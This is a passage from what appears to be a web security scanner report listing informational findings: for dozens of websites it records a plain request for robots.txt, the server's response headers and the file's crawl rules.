Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

26.36. http://tag.admeld.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Last-Modified: Mon, 02 May 2011 13:55:43 GMT
ETag: "2665af-1a-4a24b612675c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Tue, 03 May 2011 15:41:33 GMT
Connection: close

User-agent: *
Disallow: /

26.37. http://tag.contextweb.com/TagPublish/getjs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.contextweb.com

Response

HTTP/1.0 200 OK
Content-Length: 135
Content-Type: text/plain
Last-Modified: Wed, 07 Feb 2007 15:35:46 GMT
Accept-Ranges: bytes
ETag: "18b4e0a2cd4ac71:2829"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:41:23 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:23 GMT; path=/; domain=.contextweb.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

User-agent: *
Allow: /Corporate/
Disallow: /TagPublish/
Disallow: /xt2/
Disallow: /rt1/
Disallow: /CWClick/
Disallow: /ContextAd/

26.38. http://turn.nexac.com/r/pu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://turn.nexac.com
Path:	/r/pu

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: turn.nexac.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Tue, 03 May 2011 15:41:40 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

26.39. http://us.bc.yahoo.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.bc.yahoo.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: us.bc.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 15:40:38 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 03 Mar 2006 21:55:13 GMT
Accept-Ranges: bytes
Content-Length: 41
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# Do not crawl
User-agent: *
Disallow: /

26.40. http://www.1-800-volunteer.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.1-800-volunteer.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.1-800-volunteer.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:57 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 20 Jun 2010 16:40:50 GMT
ETag: "5d88bf-57e-d9ccc880"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain

# Disallow all crawlers access to certain pages.
# Version 1.1 (9/6/2006)

User-agent: asterias
Disallow: /

User-agent: yahoo-blogs/v3.9
Disallow: /

User-agent: sitecheck.internetseer.com
Disallow:
...[SNIP]...

26.41. http://www.123-reg.co.uk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.123-reg.co.uk
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.123-reg.co.uk

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:41 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 05 Jul 2010 12:47:48 GMT
ETag: "280edf-188-48aa358070500"
Accept-Ranges: bytes
Content-Length: 392
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /secure/
Disallow: /olympics2012/
Disallow: /affiliate
Disallow: /secure
Disallow: /secure-redir.cgi
Disallow: /library/
Disallow: /banners/
Disallow: /web-hosting/features/fro
...[SNIP]...

26.42. http://www.1280.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.1280.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.1280.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:28 GMT
Server: Apache/2.2.9 (Unix) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8h PHP/5.2.6 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Mon, 01 Dec 2008 09:30:52 GMT
ETag: "2440d3c-5e-45cf8ddf04b00"
Accept-Ranges: bytes
Content-Length: 94
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /include/
Disallow: /design/
Disallow: /plugins/
Disallow: /site/

26.43. http://www.181.fm/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.181.fm
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.181.fm

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:58 GMT
Server: Apache
Last-Modified: Sun, 27 Mar 2011 18:36:32 GMT
ETag: "6c13d-fb-49f7b1b244c00"
Accept-Ranges: bytes
Content-Length: 251
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /artist/bio/

# Examples
# This is an example to disallow search engines to see a particular file a.k.a: iframe
# Disallow: /a/banner.php

# This is an example to disallow sear
...[SNIP]...

26.44. http://www.1920s-fashion-and-music.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.1920s-fashion-and-music.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.1920s-fashion-and-music.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:08 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.1920s-fashion-and-music.com/Dty8ifRV.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallo
...[SNIP]...

26.45. http://www.2-clicks-stamps.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.2-clicks-stamps.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.2-clicks-stamps.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:58:54 GMT
Server: Apache/2.2.17
Last-Modified: Wed, 25 Jun 2008 03:27:34 GMT
ETag: "18c-4507541e89580"
Accept-Ranges: bytes
Content-Length: 396
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/
Disallow: /cache/
Disallow: /configs/
Disallow: /css/
Disallow: /old/
Disallow: /qlib/
Disallow: /script/
Disallow: /site_images/
Disallow: /Smarty/
Disallow: /template
...[SNIP]...

26.46. http://www.20minutos.es/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.20minutos.es
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.20minutos.es

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 21 Jan 2010 18:59:06 GMT
ETag: "1af579-1b0-47db14c157280"
X-20M-WebServer: frontal-04
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 432
Date: Tue, 03 May 2011 11:06:37 GMT
X-Varnish: 129739770 129669266
Age: 216
Via: 1.1 varnish
Connection: close
X-20M-Cache: 02

User-agent: *
Disallow: /imprimir/
Disallow: /mini20/xml
Disallow: /mini20/xml/
Disallow: /mini20/html
Disallow: /mini20/html/
Disallow: /mini20/avisos
Disallow: /mini20/avisos/
Disallow: /trivial/res
...[SNIP]...

26.47. http://www.2u.ru/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.2u.ru
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.2u.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.24
Date: Tue, 03 May 2011 10:35:37 GMT
Content-Type: text/plain; charset=windows-1251
Content-Length: 208
Last-Modified: Thu, 19 Mar 2009 09:12:00 GMT
Connection: close
Expires: Thu, 02 Jun 2011 10:35:37 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

User-agent: Slurp
User-agent: Webalta
User-agent: msnbot
Disallow: *

User-agent: *
Disallow: /screenshots/
Disallow: /*.jpg$
Disallow: /*.gif$
Disallow: /*.swf$
Disallow: /*.jpeg$
Disallow: /get-temp
...[SNIP]...

26.48. http://www.321gold.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.321gold.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.321gold.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:38:06 GMT
Server: Apache/2.2.0 (Fedora)
Last-Modified: Sun, 17 Apr 2011 12:06:16 GMT
ETag: "55f23-be-1a1b5e00"
Accept-Ranges: bytes
Content-Length: 190
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /000/
Disallow: /01.html
Disallow: /admin/
Disallow: /ads/
Disallow: /escape/
Disallow: /offshore/
Disallow: /admin/
Disallow: /z/
Disallow: /911/
Disallow: /tamsin/

26.49. http://www.3btech.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.3btech.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.3btech.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:34:53 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Tue, 03 May 2011 12:34:53 GMT
Last-Modified: Tue, 19 Apr 2011 05:04:51 GMT
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

26.50. http://www.3reef.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.3reef.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.3reef.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:29 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 18 Dec 2009 05:09:35 GMT
ETag: "3658008-2a6-bee581c0"
Accept-Ranges: bytes
Content-Length: 678
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /forums/clientscript/
Disallow: /forums/cpstyles/
Disallow: /forums/customavatars/
Disallow: /forums/images/
Disallow: /forums/includes/
Disallow: /forums/m
...[SNIP]...

26.51. http://www.3stepads.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.3stepads.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.3stepads.com

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Tue, 03 May 2011 11:09:29 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Mon, 23 Aug 2010 12:57:03 GMT
Accept-Ranges: bytes
Content-Length: 242
CF-Cache-Status: EXPIRED
Set-Cookie: __cfduid=dc369b63e8482b491554b1608cf7ba08b1304420968; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.3stepads.com
Set-Cookie: __cfduid=dc369b63e8482b491554b1608cf7ba08b1304420968; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.3stepads.com

User-agent: EmailSiphon
Disallow: /
User-agent: CherryPicker
Disallow: /
User-agent: YandexBot
Disallow: /
User-agent: Baiduspider
Disallow: /
# BEGIN XML-SITEMAP-PLUGIN
Sitemap: http://www.3stepads.c
...[SNIP]...

26.52. http://www.411.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.411.info
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.411.info

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:13:07 GMT
Server: Apache
X-Powered-By: 411.info
Vary: Accept-Encoding
Content-Length: 934
Content-Type: text/plain
Connection: close

# Welcome on 411.info, Robots!

sitemap: http://www.411.info/sitemaps/sitemap.xml
sitemap: http://www.411.info/sitemaps/bsiteindex.xml
sitemap: http://www.411.info/sitemaps/psiteindex.xml

# Universa
...[SNIP]...

26.53. http://www.4miche.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4miche.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.4miche.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/plain
Last-Modified: Mon, 14 Sep 2009 17:50:43 GMT
Accept-Ranges: bytes
ETag: "309fbce16335ca1:37b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:05:47 GMT
Connection: close

User-agent: *
Disallow: /include
Disallow: /connections
Disallow: /images

26.54. http://www.4strokes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4strokes.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.4strokes.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 16:36:45 GMT
Accept-Ranges: bytes
ETag: "70434f5b651cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:40:39 GMT
Connection: close
Content-Length: 180

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /ads
Disallow: /error_pages
Disallow: /css
Disallow: /forums.asp

User-agent: ia_archiver
Disallow: /

26.55. http://www.610wtvn.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.610wtvn.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.610wtvn.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4193365240 4193198502
X-Cache-Server: varnish03
Expires: Tue, 03 May 2011 11:40:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:40:29 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

26.56. http://www.6url.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.6url.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.6url.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: text/plain
Date: Tue, 03 May 2011 11:35:39 GMT
Accept-Ranges: bytes
ETag: "d896d2b2cc71cb1:0"
Connection: close
Set-Cookie: X-Mapping-pjfkgmck=0469261AD8CB0A45D85CC75DB7E0990C; path=/
Last-Modified: Fri, 22 Oct 2010 09:37:09 GMT
X-Powered-By: ASP.NET
Content-Length: 23

User-agent: *
Disallow:

26.57. http://www.971zht.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.971zht.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.971zht.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4191385674
X-Cache-Server: varnish03
Expires: Tue, 03 May 2011 10:26:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:26:01 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

26.58. http://www.aaaoklahoma.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aaaoklahoma.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aaaoklahoma.com

Response

HTTP/1.1 200 OK
Content-Length: 180
Content-Type: text/plain
Last-Modified: Tue, 01 Jul 2008 08:08:07 GMT
Accept-Ranges: bytes
ETag: "e49c999851dbc81:6327c"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW1
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:22:48 GMT
Connection: close

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/
Disallow: /savings/
Disallow: /memberservice/

User-agent: googlebot
Disallow: *.csi

26.59. http://www.aaaorid.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aaaorid.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aaaorid.com

Response

HTTP/1.1 200 OK
Content-Length: 415
Content-Type: text/plain
Last-Modified: Thu, 21 Apr 2011 19:27:30 GMT
Accept-Ranges: bytes
ETag: "ae49e0275a0cc1:28d7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
Date: Tue, 03 May 2011 10:39:03 GMT
Connection: close

User-agent: *
Disallow: /_FormControls/
Disallow: /_Library/
Disallow: /_MasterPages/
Disallow: /_Promos/
Disallow: /_UserControls/
Disallow: /_Widgets/
Disallow: /App_Data/
Disallow: /App_The
...[SNIP]...

26.60. http://www.aaaxvdo.tk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aaaxvdo.tk
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aaaxvdo.tk

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 10:39:20 GMT
Server: Resin/2.1.17
ETag: "AAAAS9Sxpow"
Last-Modified: Thu, 14 Apr 2011 06:50:38 GMT
Content-Type: text/plain
Content-Length: 67
Connection: close

# Robots.txt file for TK sites
#
User-agent: *
Disallow: /tikilink

26.61. http://www.aatkingdom.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aatkingdom.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aatkingdom.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:42:59 GMT
Server: Apache
Last-Modified: Fri, 03 Sep 2010 18:51:49 GMT
ETag: "1ff752-18-48f5f6c5cbfb3"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

26.62. http://www.abbee.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abbee.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.abbee.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:36:09 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
Last-Modified: Thu, 06 Mar 2008 16:21:59 GMT
ETag: "4dc876-2f-447c7230d97c0"
Accept-Ranges: bytes
Content-Length: 47
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /zurd/
Disallow: /zadz/

26.63. http://www.abc6onyourside.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc6onyourside.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.abc6onyourside.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 13 Nov 2009 20:17:43 GMT
ETag: "2b299b-107-478465a3047c0"
Cache-Control: max-age=0
Expires: Tue, 03 May 2011 10:27:15 GMT
Content-Type: text/plain; charset=UTF-8
X-Cacheable: YES
X-Life: 60.000
Content-Length: 263
Date: Tue, 03 May 2011 10:27:15 GMT
X-Varnish: 1959916288
Age: 0
Via: 1.1 varnish
Connection: close
host: abc6onyourside.com
X-Loc: wsyx
X-Cache: MISS

User-agent: *
sitemap: http://www.abc6onyourside.com/sitemap.xml
Disallow: /cgi-bin/
Disallow: /css/
Disallow: /images/
Disallow: /inc/
Disallow: /inews_wire/
Disallow: /working/
Disallow: /xm
...[SNIP]...

26.64. http://www.aboutarc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aboutarc.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aboutarc.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:46:58 GMT
Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.8 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Thu, 26 Feb 2009 17:54:08 GMT
ETag: "a8689a-636-463d609f45000"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:46:58 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.65. http://www.aboutnursing.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aboutnursing.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aboutnursing.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:06 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 10 Jul 2010 19:22:51 GMT
ETag: "1f40ab-50-48b0d720af8c0"
Accept-Ranges: bytes
Content-Length: 80
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forms/
Sitemap: http://www.aboutnursing.com/sitemap.xml

26.66. http://www.abzolute.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abzolute.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.abzolute.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:11:56 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.abzolute.net/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.67. http://www.access2wellness.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.access2wellness.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.access2wellness.com

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Tue, 03 May 2011 11:18:48 GMT
Content-type: text/plain
Last-modified: Thu, 25 Sep 2008 19:33:16 GMT
Content-length: 40
Accept-ranges: bytes
Connection: close

User-agent: ia_archiver
Disallow: /css/

26.68. http://www.activehire.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.activehire.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.activehire.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:33:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 19 Jul 2010 22:35:56 GMT
ETag: "1bd7fa-111-31226b00"
Accept-Ranges: bytes
Content-Length: 273
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Crawl-Delay: 20
Disallow: /admin/
Disallow: /conf/
Disallow: /cross_network/
Disallow: /languages/
Disallow: /js/
Disallow: /functions/
Disallow: /logo/
Disallow: /logs/
Disallow: /other
...[SNIP]...

26.69. http://www.actonsoftware.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.actonsoftware.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.actonsoftware.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"65-1300332243000"
Last-Modified: Thu, 17 Mar 2011 03:24:03 GMT
Content-Type: text/plain
Content-Length: 65
Date: Tue, 03 May 2011 10:48:43 GMT
Connection: close

User-agent: *
Disallow: /acton/
Disallow: /company_board.html

26.70. http://www.add123.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.add123.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.add123.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:45 GMT
Server: Apache/2.2.16 (Amazon)
Last-Modified: Wed, 10 Dec 2008 20:12:19 GMT
ETag: "dc043-636-45db6e083aec0"
Accept-Ranges: bytes
Content-Length: 1590
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.71. http://www.adeptr.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adeptr.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adeptr.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:45:48 GMT
Server: Apache/2.2.17
Last-Modified: Tue, 26 Aug 2008 14:25:38 GMT
ETag: "80-4555dad7fdc80"
Accept-Ranges: bytes
Content-Length: 128
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow: /cgi-bin/
Sitemap: http://www.adeptr.com/sitemap.xml

26.72. http://www.adhostingsolutions.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adhostingsolutions.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adhostingsolutions.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:01 GMT
Server: Apache/1.3.39 (Unix) mod_gzip/1.3.26.1a mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.30 OpenSSL/0.9.7a
Vary: Accept-Encoding
Last-Modified: Fri, 21 Dec 2007 16:50:30 GMT
ETag: "1390cb-12d-476beed6"
Accept-Ranges: bytes
Content-Length: 301
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /m
...[SNIP]...

26.73. http://www.adnet.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adnet.de
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adnet.de

Response

HTTP/1.1 200 OK
